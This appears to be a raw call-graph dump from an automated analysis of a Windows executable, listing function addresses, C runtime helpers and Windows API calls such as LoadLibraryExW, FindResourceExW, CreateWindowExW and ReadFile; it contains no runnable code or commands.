104739->104828 104827 b79b5c 61 API calls 2 library calls 104740->104827 104743 b79af9 104743->104704 104744 b79b06 104744->104740 104745 b79b11 104744->104745 104829 b787d5 104745->104829 104748 b79b53 104837 b79b5c 61 API calls 2 library calls 104748->104837 104751 b79b58 104751->104704 104752 b79b32 104752->104748 104753 b79b38 104752->104753 104836 b79a33 58 API calls 3 library calls 104753->104836 104755 b79b40 GetCurrentThreadId 104755->104704 104757 b7d5de __initptd 104756->104757 104758 b79c0b __lock 58 API calls 104757->104758 104759 b7d5e5 104758->104759 104760 b787d5 __calloc_crt 58 API calls 104759->104760 104762 b7d5f6 104760->104762 104761 b7d661 GetStartupInfoW 104769 b7d676 104761->104769 104770 b7d7a5 104761->104770 104762->104761 104763 b7d601 __initptd @_EH4_CallFilterFunc@8 104762->104763 104763->104708 104764 b7d86d 104851 b7d87d RtlLeaveCriticalSection _doexit 104764->104851 104766 b787d5 __calloc_crt 58 API calls 104766->104769 104767 b7d7f2 GetStdHandle 104767->104770 104768 b7d805 GetFileType 104768->104770 104769->104766 104769->104770 104771 b7d6c4 104769->104771 104770->104764 104770->104767 104770->104768 104850 b79e2b InitializeCriticalSectionAndSpinCount 104770->104850 104771->104770 104772 b7d6f8 GetFileType 104771->104772 104849 b79e2b InitializeCriticalSectionAndSpinCount 104771->104849 104772->104771 104776 b77d06 104775->104776 104777 b84f34 104775->104777 104781 b84b1b GetModuleFileNameW 104776->104781 104852 b7881d 58 API calls 2 library calls 104777->104852 104779 b84f70 FreeEnvironmentStringsW 104779->104776 104780 b84f5a _memmove 104780->104779 104782 b84b4f _wparse_cmdline 104781->104782 104784 b84b8f _wparse_cmdline 104782->104784 104853 b7881d 58 API calls 2 library calls 104782->104853 104784->104715 104786 b84d69 104785->104786 104787 b84d71 __NMSG_WRITE 104785->104787 104786->104719 104788 b787d5 __calloc_crt 58 API calls 104787->104788 104792 b84d9a __NMSG_WRITE 104788->104792 104789 b84df1 104790 b72d55 _free 58 API calls 104789->104790 104790->104786 104791 b787d5 __calloc_crt 58 API calls 104791->104792 104792->104786 104792->104789 104792->104791 104793 b84e16 104792->104793 104796 b84e2d 104792->104796 104854 b84607 58 API calls __mbschr_l 104792->104854 104794 b72d55 _free 58 API calls 104793->104794 104794->104786 104855 b78dc6 IsProcessorFeaturePresent 104796->104855 104798 b84e39 104798->104719 104800 b730fb __IsNonwritableInCurrentImage 104799->104800 104878 b7a4d1 104800->104878 104802 b73119 __initterm_e 104803 b72d40 __cinit 67 API calls 104802->104803 104804 b73138 __cinit __IsNonwritableInCurrentImage 104802->104804 104803->104804 104804->104723 104806 b547ea 104805->104806 104816 b54889 104805->104816 104807 b54824 74A3C8D0 104806->104807 104881 b7336c 104807->104881 104811 b54850 104893 b548fd SystemParametersInfoW SystemParametersInfoW 104811->104893 104813 b5485c 104894 b53b3a 104813->104894 104815 b54864 SystemParametersInfoW 104815->104816 104816->104727 104817->104701 104818->104705 104819->104712 104823->104728 104824->104731 104825->104737 104826->104739 104827->104743 104828->104744 104831 b787dc 104829->104831 104832 b78817 104831->104832 104834 b787fa 104831->104834 104838 b851f6 104831->104838 104832->104748 104835 b79de6 TlsSetValue 104832->104835 104834->104831 104834->104832 104846 b7a132 Sleep 104834->104846 104835->104752 104836->104755 104837->104751 104839 b85201 104838->104839 104843 b8521c 104838->104843 104840 b8520d 104839->104840 104839->104843 104847 b78b28 58 API calls __getptd_noexit 104840->104847 104842 b8522c RtlAllocateHeap 104842->104843 104844 b85212 104842->104844 104843->104842 104843->104844 104848 b733a1 RtlDecodePointer 104843->104848 104844->104831 104846->104834 104847->104844 104848->104843 104849->104771 104850->104770 104851->104763 104852->104780 104853->104784 104854->104792 104856 b78dd1 104855->104856 104861 b78c59 104856->104861 104860 b78dec 104860->104798 104862 b78c73 _memset ___raise_securityfailure 104861->104862 104863 b78c93 IsDebuggerPresent 104862->104863 104869 b7a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 104863->104869 104865 b78d57 ___raise_securityfailure 104870 b7c5f6 104865->104870 104867 b78d7a 104868 b7a140 GetCurrentProcess TerminateProcess 104867->104868 104868->104860 104869->104865 104871 b7c600 IsProcessorFeaturePresent 104870->104871 104872 b7c5fe 104870->104872 104874 b8590a 104871->104874 104872->104867 104877 b858b9 5 API calls 2 library calls 104874->104877 104876 b859ed 104876->104867 104877->104876 104879 b7a4d4 RtlEncodePointer 104878->104879 104879->104879 104880 b7a4ee 104879->104880 104880->104802 104882 b79c0b __lock 58 API calls 104881->104882 104883 b73377 RtlDecodePointer RtlEncodePointer 104882->104883 104946 b79d75 RtlLeaveCriticalSection 104883->104946 104885 b54849 104886 b733d4 104885->104886 104887 b733f8 104886->104887 104888 b733de 104886->104888 104887->104811 104888->104887 104947 b78b28 58 API calls __getptd_noexit 104888->104947 104890 b733e8 104948 b78db6 9 API calls __mbschr_l 104890->104948 104892 b733f3 104892->104811 104893->104813 104895 b53b47 __write_nolock 104894->104895 104896 b57667 59 API calls 104895->104896 104897 b53b51 GetCurrentDirectoryW 104896->104897 104949 b53766 104897->104949 104899 b53b7a IsDebuggerPresent 104900 b8d272 MessageBoxA 104899->104900 104901 b53b88 104899->104901 104903 b8d28c 104900->104903 104901->104903 104904 b53ba5 104901->104904 104933 b53c61 104901->104933 104902 b53c68 SetCurrentDirectoryW 104909 b53c75 Mailbox 104902->104909 105168 b57213 59 API calls Mailbox 104903->105168 105030 b57285 104904->105030 104907 b8d29c 104913 b8d2b2 SetCurrentDirectoryW 104907->104913 104909->104815 104910 b53bc3 GetFullPathNameW 105046 b57bcc 104910->105046 104912 b53bfe 105055 b6092d 104912->105055 104913->104909 104916 b53c1c 104917 b53c26 104916->104917 105169 ba874b AllocateAndInitializeSid CheckTokenMembership FreeSid 104916->105169 105071 b53a46 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 104917->105071 104920 b8d2cf 104920->104917 104923 b8d2e0 104920->104923 105170 b54706 104923->105170 104924 b53c30 104926 b53c43 104924->104926 105079 b5434a 104924->105079 105090 b609d0 104926->105090 104927 b8d2e8 105177 b57de1 104927->105177 104933->104902 104946->104885 104947->104890 104948->104892 104950 b57667 59 API calls 104949->104950 104951 b5377c 104950->104951 105197 b53d31 104951->105197 104953 b5379a 104954 b54706 61 API calls 104953->104954 104955 b537ae 104954->104955 104956 b57de1 59 API calls 104955->104956 104957 b537bb 104956->104957 105211 b54ddd 104957->105211 104960 b537dc Mailbox 105235 b58047 104960->105235 104961 b8d173 105282 bb955b 104961->105282 104964 b8d192 104967 b72d55 _free 58 API calls 104964->104967 104969 b8d19f 104967->104969 104971 b54e4a 84 API calls 104969->104971 104973 b8d1a8 104971->104973 104978 b53ed0 59 API calls 104973->104978 104974 b57de1 59 API calls 104975 b53808 104974->104975 105242 b584c0 104975->105242 104977 b5381a Mailbox 104980 b57de1 59 API calls 104977->104980 104979 b8d1c3 104978->104979 104981 b53ed0 59 API calls 104979->104981 104982 b53840 104980->104982 104983 b8d1df 104981->104983 104984 b584c0 69 API calls 104982->104984 104985 b54706 61 API calls 104983->104985 104987 b5384f Mailbox 104984->104987 104986 b8d204 104985->104986 104988 b53ed0 59 API calls 104986->104988 104990 b57667 59 API calls 104987->104990 104989 b8d210 104988->104989 104991 b58047 59 API calls 104989->104991 104992 b5386d 104990->104992 104993 b8d21e 104991->104993 105246 b53ed0 104992->105246 104995 b53ed0 59 API calls 104993->104995 104997 b8d22d 104995->104997 105003 b58047 59 API calls 104997->105003 104999 b53887 104999->104973 105000 b53891 104999->105000 105001 b72efd _W_store_winword 60 API calls 105000->105001 105002 b5389c 105001->105002 105002->104979 105004 b538a6 105002->105004 105005 b8d24f 105003->105005 105006 b72efd _W_store_winword 60 API calls 105004->105006 105007 b53ed0 59 API calls 105005->105007 105008 b538b1 105006->105008 105009 b8d25c 105007->105009 105008->104983 105010 b538bb 105008->105010 105009->105009 105011 b72efd _W_store_winword 60 API calls 105010->105011 105012 b538c6 105011->105012 105012->104997 105013 b53907 105012->105013 105015 b53ed0 59 API calls 105012->105015 105013->104997 105014 b53914 105013->105014 105262 b592ce 105014->105262 105017 b538ea 105015->105017 105019 b58047 59 API calls 105017->105019 105021 b538f8 105019->105021 105022 b53ed0 59 API calls 105021->105022 105022->105013 105025 b5928a 59 API calls 105027 b5394f 105025->105027 105026 b58ee0 60 API calls 105026->105027 105027->105025 105027->105026 105028 b53ed0 59 API calls 105027->105028 105029 b53995 Mailbox 105027->105029 105028->105027 105029->104899 105031 b57292 __write_nolock 105030->105031 105032 b572ab 105031->105032 105033 b8ea22 _memset 105031->105033 106140 b54750 105032->106140 105035 b8ea3e 75D3D0D0 105033->105035 105037 b8ea8d 105035->105037 105039 b57bcc 59 API calls 105037->105039 105041 b8eaa2 105039->105041 105041->105041 105043 b572c9 106168 b5686a 105043->106168 105047 b57c45 105046->105047 105048 b57bd8 __NMSG_WRITE 105046->105048 105049 b57d2c 59 API calls 105047->105049 105050 b57c13 105048->105050 105051 b57bee 105048->105051 105054 b57bf6 _memmove 105049->105054 105053 b58029 59 API calls 105050->105053 106502 b57f27 59 API calls Mailbox 105051->106502 105053->105054 105054->104912 105056 b6093a __write_nolock 105055->105056 106503 b56d80 105056->106503 105058 b6093f 105059 b53c14 105058->105059 106514 b6119e 89 API calls 105058->106514 105059->104907 105059->104916 105061 b6094c 105061->105059 106515 b63ee7 91 API calls Mailbox 105061->106515 105063 b60955 105063->105059 105064 b60959 GetFullPathNameW 105063->105064 105065 b57bcc 59 API calls 105064->105065 105066 b60985 105065->105066 105067 b57bcc 59 API calls 105066->105067 105068 b60992 105067->105068 105069 b94cab _wcscat 105068->105069 105070 b57bcc 59 API calls 105068->105070 105070->105059 105072 b53ab0 LoadImageW RegisterClassExW 105071->105072 105073 b8d261 105071->105073 106553 b53041 GetSysColorBrush RegisterClassExW RegisterClipboardFormatW 105072->106553 106557 b547a0 LoadImageW EnumResourceNamesW 105073->106557 105077 b8d26a 105078 b539d5 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 105078->104924 105080 b54375 _memset 105079->105080 106558 b54182 105080->106558 105083 b543fa 105091 b94cc3 105090->105091 105103 b609f5 105090->105103 106618 bb9e4a 89 API calls 4 library calls 105091->106618 105166 b60a05 Mailbox 105103->105166 106619 b59e5d 60 API calls 105103->106619 106620 ba6349 341 API calls 105103->106620 105152 bb9e4a 89 API calls 105152->105166 105154 b584c0 69 API calls 105154->105166 105155 b59c90 59 API calls Mailbox 105155->105166 105156 b5b73c 314 API calls 105156->105166 105166->105152 105166->105154 105166->105155 105166->105156 105168->104907 105169->104920 105171 b81940 __write_nolock 105170->105171 105172 b54713 GetModuleFileNameW 105171->105172 105173 b57de1 59 API calls 105172->105173 105174 b54739 105173->105174 105175 b54750 60 API calls 105174->105175 105176 b54743 Mailbox 105175->105176 105176->104927 105178 b57df0 __NMSG_WRITE _memmove 105177->105178 105198 b53d3e __write_nolock 105197->105198 105199 b57bcc 59 API calls 105198->105199 105204 b53ea4 Mailbox 105198->105204 105201 b53d70 105199->105201 105209 b53da6 Mailbox 105201->105209 105323 b579f2 105201->105323 105202 b53e77 105203 b57de1 59 API calls 105202->105203 105202->105204 105206 b53e98 105203->105206 105204->104953 105205 b57de1 59 API calls 105205->105209 105207 b53f74 59 API calls 105206->105207 105207->105204 105209->105202 105209->105204 105209->105205 105210 b579f2 59 API calls 105209->105210 105326 b53f74 105209->105326 105210->105209 105336 b54bb5 105211->105336 105216 b54e08 LoadLibraryExW 105346 b54b6a 105216->105346 105217 b8d8e6 105219 b54e4a 84 API calls 105217->105219 105221 b8d8ed 105219->105221 105223 b54b6a 3 API calls 105221->105223 105224 b8d8f5 105223->105224 105372 b54f0b 105224->105372 105225 b54e2f 105225->105224 105226 b54e3b 105225->105226 105228 b54e4a 84 API calls 105226->105228 105230 b537d4 105228->105230 105230->104960 105230->104961 105232 b8d91c 105378 b54ec7 105232->105378 105234 b8d929 105236 b58052 105235->105236 105237 b537ef 105235->105237 105802 b57f77 59 API calls 2 library calls 105236->105802 105239 b5928a 105237->105239 105240 b70db6 Mailbox 59 API calls 105239->105240 105241 b537fb 105240->105241 105241->104974 105243 b584cb 105242->105243 105245 b584f2 105243->105245 105803 b589b3 69 API calls Mailbox 105243->105803 105245->104977 105247 b53ef3 105246->105247 105248 b53eda 105246->105248 105250 b57bcc 59 API calls 105247->105250 105249 b58047 59 API calls 105248->105249 105251 b53879 105249->105251 105250->105251 105252 b72efd 105251->105252 105253 b72f7e 105252->105253 105254 b72f09 105252->105254 105806 b72f90 60 API calls 3 library calls 105253->105806 105261 b72f2e 105254->105261 105804 b78b28 58 API calls __getptd_noexit 105254->105804 105257 b72f8b 105257->104999 105258 b72f15 105805 b78db6 9 API calls __mbschr_l 105258->105805 105260 b72f20 105260->104999 105261->104999 105263 b592d6 105262->105263 105264 b70db6 Mailbox 59 API calls 105263->105264 105265 b592e4 105264->105265 105267 b53924 105265->105267 105807 b591fc 59 API calls Mailbox 105265->105807 105268 b59050 105267->105268 105808 b59160 105268->105808 105270 b70db6 Mailbox 59 API calls 105271 b53932 105270->105271 105273 b58ee0 105271->105273 105272 b5905f 105272->105270 105272->105271 105274 b58ef7 105273->105274 105275 b8f17c 105273->105275 105277 b58fff 105274->105277 105278 b59040 105274->105278 105279 b58ff8 105274->105279 105275->105274 105818 b58bdb 59 API calls Mailbox 105275->105818 105277->105027 105817 b59d3c 60 API calls Mailbox 105278->105817 105280 b70db6 Mailbox 59 API calls 105279->105280 105280->105277 105283 b54ee5 85 API calls 105282->105283 105284 bb95ca 105283->105284 105819 bb9734 96 API calls 2 library calls 105284->105819 105286 bb95dc 105287 b54f0b 74 API calls 105286->105287 105315 b8d186 105286->105315 105288 bb95f7 105287->105288 105289 b54f0b 74 API calls 105288->105289 105290 bb9607 105289->105290 105291 b54f0b 74 API calls 105290->105291 105292 bb9622 105291->105292 105293 b54f0b 74 API calls 105292->105293 105294 bb963d 105293->105294 105295 b54ee5 85 API calls 105294->105295 105296 bb9654 105295->105296 105297 b7571c __crtCompareStringA_stat 58 API calls 105296->105297 105298 bb965b 105297->105298 105299 b7571c __crtCompareStringA_stat 58 API calls 105298->105299 105300 bb9665 105299->105300 105301 b54f0b 74 API calls 105300->105301 105302 bb9679 105301->105302 105820 bb9109 GetSystemTimeAsFileTime 105302->105820 105304 bb968c 105305 bb96a1 105304->105305 105306 bb96b6 105304->105306 105307 b72d55 _free 58 API calls 105305->105307 105308 bb971b 105306->105308 105309 bb96bc 105306->105309 105310 bb96a7 105307->105310 105312 b72d55 _free 58 API calls 105308->105312 105821 bb8b06 105309->105821 105313 b72d55 _free 58 API calls 105310->105313 105312->105315 105313->105315 105315->104964 105317 b54e4a 105315->105317 105316 b72d55 _free 58 API calls 105316->105315 105318 b54e54 105317->105318 105320 b54e5b 105317->105320 105319 b753a6 __fcloseall 83 API calls 105318->105319 105319->105320 105321 b54e7b FreeLibrary 105320->105321 105322 b54e6a 105320->105322 105321->105322 105322->104964 105332 b57e4f 105323->105332 105325 b579fd 105325->105201 105327 b53f82 105326->105327 105331 b53fa4 _memmove 105326->105331 105329 b70db6 Mailbox 59 API calls 105327->105329 105328 b70db6 Mailbox 59 API calls 105330 b53fb8 105328->105330 105329->105331 105330->105209 105331->105328 105333 b57e62 105332->105333 105335 b57e5f _memmove 105332->105335 105334 b70db6 Mailbox 59 API calls 105333->105334 105334->105335 105335->105325 105383 b54c03 105336->105383 105339 b54bf5 105343 b7525b 105339->105343 105340 b54bec FreeLibrary 105340->105339 105341 b54c03 2 API calls 105342 b54bdc 105341->105342 105342->105339 105342->105340 105387 b75270 105343->105387 105345 b54dfc 105345->105216 105345->105217 105544 b54c36 105346->105544 105349 b54c36 2 API calls 105352 b54b8f 105349->105352 105350 b54ba1 FreeLibrary 105351 b54baa 105350->105351 105353 b54c70 105351->105353 105352->105350 105352->105351 105354 b70db6 Mailbox 59 API calls 105353->105354 105355 b54c85 105354->105355 105548 b5522e 105355->105548 105357 b54c91 _memmove 105358 b54ccc 105357->105358 105359 b54dc1 105357->105359 105360 b54d89 105357->105360 105361 b54ec7 69 API calls 105358->105361 105562 bb991b 95 API calls 105359->105562 105551 b54e89 CreateStreamOnHGlobal 105360->105551 105369 b54cd5 105361->105369 105364 b54f0b 74 API calls 105364->105369 105366 b54d69 105366->105225 105367 b8d8a7 105368 b54ee5 85 API calls 105367->105368 105370 b8d8bb 105368->105370 105369->105364 105369->105366 105369->105367 105557 b54ee5 105369->105557 105371 b54f0b 74 API calls 105370->105371 105371->105366 105373 b8d9cd 105372->105373 105374 b54f1d 105372->105374 105586 b755e2 105374->105586 105377 bb9109 GetSystemTimeAsFileTime 105377->105232 105379 b54ed6 105378->105379 105382 b8d990 105378->105382 105784 b75c60 105379->105784 105381 b54ede 105381->105234 105384 b54bd0 105383->105384 105385 b54c0c LoadLibraryA 105383->105385 105384->105341 105384->105342 105385->105384 105386 b54c1d GetProcAddress 105385->105386 105386->105384 105389 b7527c __initptd 105387->105389 105388 b7528f 105436 b78b28 58 API calls __getptd_noexit 105388->105436 105389->105388 105391 b752c0 105389->105391 105406 b804e8 105391->105406 105392 b75294 105437 b78db6 9 API calls __mbschr_l 105392->105437 105395 b752c5 105396 b752ce 105395->105396 105397 b752db 105395->105397 105438 b78b28 58 API calls __getptd_noexit 105396->105438 105399 b75305 105397->105399 105400 b752e5 105397->105400 105421 b80607 105399->105421 105439 b78b28 58 API calls __getptd_noexit 105400->105439 105405 b7529f __initptd @_EH4_CallFilterFunc@8 105405->105345 105407 b804f4 __initptd 105406->105407 105408 b79c0b __lock 58 API calls 105407->105408 105418 b80502 105408->105418 105409 b80576 105441 b805fe 105409->105441 105410 b8057d 105446 b7881d 58 API calls 2 library calls 105410->105446 105413 b805f3 __initptd 105413->105395 105414 b80584 105414->105409 105447 b79e2b InitializeCriticalSectionAndSpinCount 105414->105447 105417 b79c93 __mtinitlocknum 58 API calls 105417->105418 105418->105409 105418->105410 105418->105417 105444 b76c50 59 API calls __lock 105418->105444 105445 b76cba RtlLeaveCriticalSection RtlLeaveCriticalSection _doexit 105418->105445 105419 b805aa RtlEnterCriticalSection 105419->105409 105422 b80627 __wopenfile 105421->105422 105423 b80641 105422->105423 105435 b807fc 105422->105435 105454 b737cb 60 API calls 2 library calls 105422->105454 105452 b78b28 58 API calls __getptd_noexit 105423->105452 105425 b80646 105453 b78db6 9 API calls __mbschr_l 105425->105453 105427 b8085f 105449 b885a1 105427->105449 105429 b75310 105440 b75332 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 105429->105440 105431 b807f5 105431->105435 105455 b737cb 60 API calls 2 library calls 105431->105455 105433 b80814 105433->105435 105456 b737cb 60 API calls 2 library calls 105433->105456 105435->105423 105435->105427 105436->105392 105437->105405 105438->105405 105439->105405 105440->105405 105448 b79d75 RtlLeaveCriticalSection 105441->105448 105443 b80605 105443->105413 105444->105418 105445->105418 105446->105414 105447->105419 105448->105443 105457 b87d85 105449->105457 105451 b885ba 105451->105429 105452->105425 105453->105429 105454->105431 105455->105433 105456->105435 105460 b87d91 __initptd 105457->105460 105458 b87da7 105541 b78b28 58 API calls __getptd_noexit 105458->105541 105460->105458 105462 b87ddd 105460->105462 105461 b87dac 105542 b78db6 9 API calls __mbschr_l 105461->105542 105468 b87e4e 105462->105468 105465 b87db6 __initptd 105465->105451 105466 b87df9 105543 b87e22 RtlLeaveCriticalSection __unlock_fhandle 105466->105543 105469 b87e6e 105468->105469 105470 b744ea __wsopen_nolock 58 API calls 105469->105470 105473 b87e8a 105470->105473 105471 b78dc6 __invoke_watson 8 API calls 105472 b885a0 105471->105472 105475 b87d85 __wsopen_helper 103 API calls 105472->105475 105474 b87ec4 105473->105474 105485 b87ee7 105473->105485 105517 b87fc1 105473->105517 105476 b78af4 __close 58 API calls 105474->105476 105477 b885ba 105475->105477 105478 b87ec9 105476->105478 105477->105466 105479 b78b28 __mbschr_l 58 API calls 105478->105479 105480 b87ed6 105479->105480 105482 b78db6 __mbschr_l 9 API calls 105480->105482 105481 b87fa5 105483 b78af4 __close 58 API calls 105481->105483 105484 b87ee0 105482->105484 105486 b87faa 105483->105486 105484->105466 105485->105481 105489 b87f83 105485->105489 105487 b78b28 __mbschr_l 58 API calls 105486->105487 105488 b87fb7 105487->105488 105490 b78db6 __mbschr_l 9 API calls 105488->105490 105491 b7d294 __alloc_osfhnd 61 API calls 105489->105491 105490->105517 105492 b88051 105491->105492 105493 b8805b 105492->105493 105494 b8807e 105492->105494 105495 b78af4 __close 58 API calls 105493->105495 105496 b87cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105494->105496 105497 b88060 105495->105497 105504 b880a0 105496->105504 105498 b78b28 __mbschr_l 58 API calls 105497->105498 105501 b8806a 105498->105501 105499 b8811e GetFileType 105502 b88129 GetLastError 105499->105502 105503 b8816b 105499->105503 105500 b880ec GetLastError 105505 b78b07 __dosmaperr 58 API calls 105500->105505 105506 b78b28 __mbschr_l 58 API calls 105501->105506 105507 b78b07 __dosmaperr 58 API calls 105502->105507 105511 b7d52a __set_osfhnd 59 API calls 105503->105511 105504->105499 105504->105500 105508 b87cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105504->105508 105512 b88111 105505->105512 105506->105484 105509 b88150 CloseHandle 105507->105509 105510 b880e1 105508->105510 105509->105512 105513 b8815e 105509->105513 105510->105499 105510->105500 105519 b88189 105511->105519 105514 b78b28 __mbschr_l 58 API calls 105512->105514 105515 b78b28 __mbschr_l 58 API calls 105513->105515 105514->105517 105516 b88163 105515->105516 105516->105512 105517->105471 105518 b88344 105518->105517 105521 b88517 CloseHandle 105518->105521 105519->105518 105520 b818c1 __lseeki64_nolock 60 API calls 105519->105520 105536 b8820a 105519->105536 105522 b881f3 105520->105522 105523 b87cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105521->105523 105526 b78af4 __close 58 API calls 105522->105526 105522->105536 105525 b8853e 105523->105525 105524 b80e5b 70 API calls __read_nolock 105524->105536 105527 b88572 105525->105527 105528 b88546 GetLastError 105525->105528 105526->105536 105527->105517 105529 b78b07 __dosmaperr 58 API calls 105528->105529 105532 b88552 105529->105532 105530 b80add __close_nolock 61 API calls 105530->105536 105531 b818c1 60 API calls __lseeki64_nolock 105531->105536 105533 b7d43d __free_osfhnd 59 API calls 105532->105533 105533->105527 105534 b897a2 __chsize_nolock 82 API calls 105534->105536 105535 b7d886 __write 78 API calls 105535->105536 105536->105518 105536->105524 105536->105530 105536->105531 105536->105534 105536->105535 105537 b883c1 105536->105537 105538 b80add __close_nolock 61 API calls 105537->105538 105539 b883c8 105538->105539 105540 b78b28 __mbschr_l 58 API calls 105539->105540 105540->105517 105541->105461 105542->105465 105543->105465 105545 b54b83 105544->105545 105546 b54c3f LoadLibraryA 105544->105546 105545->105349 105545->105352 105546->105545 105547 b54c50 GetProcAddress 105546->105547 105547->105545 105549 b70db6 Mailbox 59 API calls 105548->105549 105550 b55240 105549->105550 105550->105357 105552 b54ea3 FindResourceExW 105551->105552 105556 b54ec0 105551->105556 105553 b8d933 LoadResource 105552->105553 105552->105556 105554 b8d948 SizeofResource 105553->105554 105553->105556 105555 b8d95c LockResource 105554->105555 105554->105556 105555->105556 105556->105358 105558 b54ef4 105557->105558 105559 b8d9ab 105557->105559 105563 b7584d 105558->105563 105561 b54f02 105561->105369 105562->105358 105566 b75859 __initptd 105563->105566 105564 b7586b 105576 b78b28 58 API calls __getptd_noexit 105564->105576 105566->105564 105567 b75891 105566->105567 105578 b76c11 105567->105578 105568 b75870 105577 b78db6 9 API calls __mbschr_l 105568->105577 105571 b75897 105584 b757be 83 API calls 5 library calls 105571->105584 105573 b758a6 105585 b758c8 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 105573->105585 105575 b7587b __initptd 105575->105561 105576->105568 105577->105575 105579 b76c43 RtlEnterCriticalSection 105578->105579 105580 b76c21 105578->105580 105583 b76c39 105579->105583 105580->105579 105581 b76c29 105580->105581 105582 b79c0b __lock 58 API calls 105581->105582 105582->105583 105583->105571 105584->105573 105585->105575 105589 b755fd 105586->105589 105588 b54f2e 105588->105377 105590 b75609 __initptd 105589->105590 105591 b7564c 105590->105591 105592 b75644 __initptd 105590->105592 105597 b7561f _memset 105590->105597 105593 b76c11 __lock_file 59 API calls 105591->105593 105592->105588 105594 b75652 105593->105594 105602 b7541d 105594->105602 105616 b78b28 58 API calls __getptd_noexit 105597->105616 105598 b75639 105617 b78db6 9 API calls __mbschr_l 105598->105617 105603 b75453 105602->105603 105606 b75438 _memset 105602->105606 105618 b75686 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 105603->105618 105604 b75443 105714 b78b28 58 API calls __getptd_noexit 105604->105714 105606->105603 105606->105604 105609 b75493 105606->105609 105609->105603 105610 b755a4 _memset 105609->105610 105619 b746e6 105609->105619 105626 b80e5b 105609->105626 105694 b80ba7 105609->105694 105716 b80cc8 58 API calls 3 library calls 105609->105716 105717 b78b28 58 API calls __getptd_noexit 105610->105717 105615 b75448 105715 b78db6 9 API calls __mbschr_l 105615->105715 105616->105598 105617->105592 105618->105592 105620 b74705 105619->105620 105621 b746f0 105619->105621 105620->105609 105718 b78b28 58 API calls __getptd_noexit 105621->105718 105623 b746f5 105719 b78db6 9 API calls __mbschr_l 105623->105719 105625 b74700 105625->105609 105627 b80e7c 105626->105627 105628 b80e93 105626->105628 105729 b78af4 58 API calls __getptd_noexit 105627->105729 105629 b815cb 105628->105629 105633 b80ecd 105628->105633 105745 b78af4 58 API calls __getptd_noexit 105629->105745 105632 b80e81 105730 b78b28 58 API calls __getptd_noexit 105632->105730 105636 b80ed5 105633->105636 105642 b80eec 105633->105642 105634 b815d0 105746 b78b28 58 API calls __getptd_noexit 105634->105746 105731 b78af4 58 API calls __getptd_noexit 105636->105731 105639 b80ee1 105747 b78db6 9 API calls __mbschr_l 105639->105747 105640 b80eda 105732 b78b28 58 API calls __getptd_noexit 105640->105732 105643 b80f01 105642->105643 105644 b80f1b 105642->105644 105647 b80f39 105642->105647 105674 b80e88 105642->105674 105733 b78af4 58 API calls __getptd_noexit 105643->105733 105644->105643 105649 b80f26 105644->105649 105734 b7881d 58 API calls 2 library calls 105647->105734 105720 b85c6b 105649->105720 105650 b80f49 105652 b80f6c 105650->105652 105653 b80f51 105650->105653 105737 b818c1 60 API calls 3 library calls 105652->105737 105735 b78b28 58 API calls __getptd_noexit 105653->105735 105654 b8103a 105657 b810b3 ReadFile 105654->105657 105658 b81050 GetConsoleMode 105654->105658 105660 b81593 GetLastError 105657->105660 105661 b810d5 105657->105661 105662 b810b0 105658->105662 105663 b81064 105658->105663 105659 b80f56 105736 b78af4 58 API calls __getptd_noexit 105659->105736 105665 b815a0 105660->105665 105666 b81093 105660->105666 105661->105660 105669 b810a5 105661->105669 105662->105657 105663->105662 105667 b8106a ReadConsoleW 105663->105667 105743 b78b28 58 API calls __getptd_noexit 105665->105743 105679 b81099 105666->105679 105738 b78b07 58 API calls 3 library calls 105666->105738 105667->105669 105670 b8108d GetLastError 105667->105670 105676 b8110a 105669->105676 105677 b81377 105669->105677 105669->105679 105670->105666 105672 b815a5 105744 b78af4 58 API calls __getptd_noexit 105672->105744 105674->105609 105675 b72d55 _free 58 API calls 105675->105674 105678 b811f7 105676->105678 105681 b81176 ReadFile 105676->105681 105677->105679 105682 b8147d ReadFile 105677->105682 105678->105679 105684 b812b4 105678->105684 105685 b812a4 105678->105685 105688 b81264 MultiByteToWideChar 105678->105688 105679->105674 105679->105675 105683 b81197 GetLastError 105681->105683 105692 b811a1 105681->105692 105687 b814a0 GetLastError 105682->105687 105693 b814ae 105682->105693 105683->105692 105684->105688 105741 b818c1 60 API calls 3 library calls 105684->105741 105740 b78b28 58 API calls __getptd_noexit 105685->105740 105687->105693 105688->105670 105688->105679 105692->105676 105739 b818c1 60 API calls 3 library calls 105692->105739 105693->105677 105742 b818c1 60 API calls 3 library calls 105693->105742 105695 b80bb2 105694->105695 105699 b80bc7 105694->105699 105781 b78b28 58 API calls __getptd_noexit 105695->105781 105697 b80bb7 105782 b78db6 9 API calls __mbschr_l 105697->105782 105700 b80bfc 105699->105700 105706 b80bc2 105699->105706 105783 b85fe4 58 API calls __malloc_crt 105699->105783 105702 b746e6 __flswbuf 58 API calls 105700->105702 105703 b80c10 105702->105703 105748 b80d47 105703->105748 105705 b80c17 105705->105706 105707 b746e6 __flswbuf 58 API calls 105705->105707 105706->105609 105708 b80c3a 105707->105708 105708->105706 105709 b746e6 __flswbuf 58 API calls 105708->105709 105710 b80c46 105709->105710 105710->105706 105711 b746e6 __flswbuf 58 API calls 105710->105711 105712 b80c53 105711->105712 105713 b746e6 __flswbuf 58 API calls 105712->105713 105713->105706 105714->105615 105715->105603 105716->105609 105717->105615 105718->105623 105719->105625 105721 b85c83 105720->105721 105722 b85c76 105720->105722 105724 b85c8f 105721->105724 105725 b78b28 __mbschr_l 58 API calls 105721->105725 105723 b78b28 __mbschr_l 58 API calls 105722->105723 105726 b85c7b 105723->105726 105724->105654 105727 b85cb0 105725->105727 105726->105654 105728 b78db6 __mbschr_l 9 API calls 105727->105728 105728->105726 105729->105632 105730->105674 105731->105640 105732->105639 105733->105640 105734->105650 105735->105659 105736->105674 105737->105649 105738->105679 105739->105692 105740->105679 105741->105688 105742->105693 105743->105672 105744->105679 105745->105634 105746->105639 105747->105674 105749 b80d53 __initptd 105748->105749 105750 b80d60 105749->105750 105751 b80d77 105749->105751 105753 b78af4 __close 58 API calls 105750->105753 105752 b80e3b 105751->105752 105754 b80d8b 105751->105754 105755 b78af4 __close 58 API calls 105752->105755 105756 b80d65 105753->105756 105758 b80da9 105754->105758 105759 b80db6 105754->105759 105760 